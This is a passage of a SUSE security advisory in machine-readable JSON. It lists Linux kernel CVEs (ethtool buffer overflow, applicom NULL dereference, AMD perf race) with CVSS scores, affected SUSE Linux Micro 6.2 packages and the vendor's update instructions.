"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68792"
},
{
"cve": "CVE-2025-68795",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68795"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: Avoid overflowing userspace buffer on stats query\n\nThe ethtool -S command operates across three ioctl calls:\nETHTOOL_GSSET_INFO for the size, ETHTOOL_GSTRINGS for the names, and\nETHTOOL_GSTATS for the values.\n\nIf the number of stats changes between these calls (e.g., due to device\nreconfiguration), userspace\u0027s buffer allocation will be incorrect,\npotentially leading to buffer overflow.\n\nDrivers are generally expected to maintain stable stat counts, but some\ndrivers (e.g., mlx5, bnx2x, bna, ksz884x) use dynamic counters, making\nthis scenario possible.\n\nSome drivers try to handle this internally:\n- bnad_get_ethtool_stats() returns early in case stats.n_stats is not\n equal to the driver\u0027s stats count.\n- micrel/ksz884x also makes sure not to write anything beyond\n stats.n_stats and overflow the buffer.\n\nHowever, both use stats.n_stats which is already assigned with the value\nreturned from get_sset_count(), hence won\u0027t solve the issue described\nhere.\n\nChange ethtool_get_strings(), ethtool_get_stats(),\nethtool_get_phy_stats() to not return anything in case of a mismatch\nbetween userspace\u0027s size and get_sset_size(), to prevent buffer\noverflow.\nThe returned n_stats value will be equal to zero, to reflect that\nnothing has been returned.\n\nThis could result in one of two cases when using upstream ethtool,\ndepending on when the size change is detected:\n1. When detected in ethtool_get_strings():\n # ethtool -S eth2\n no stats available\n\n2. When detected in get stats, all stats will be reported as zero.\n\nBoth cases are presumably transient, and a subsequent ethtool call\nshould succeed.\n\nOther than the overflow avoidance, these two cases are very evident (no\noutput/cleared stats), which is arguably better than presenting\nincorrect/shifted stats.\nI also considered returning an error instead of a \"silent\" response, but\nthat seems more destructive towards userspace apps.\n\nNotes:\n- This patch does not claim to fix the inherent race, it only makes sure\n that we do not overflow the userspace buffer, and makes for a more\n predictable behavior.\n\n- RTNL lock is held during each ioctl, the race window exists between\n the separate ioctl calls when the lock is released.\n\n- Userspace ethtool always fills stats.n_stats, but it is likely that\n these stats ioctls are implemented in other userspace applications\n which might not fill it. The added code checks that it\u0027s not zero,\n to prevent any regressions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68795",
"url": "https://www.suse.com/security/cve/CVE-2025-68795"
},
{
"category": "external",
"summary": "SUSE Bug 1256688 for CVE-2025-68795",
"url": "https://bugzilla.suse.com/1256688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
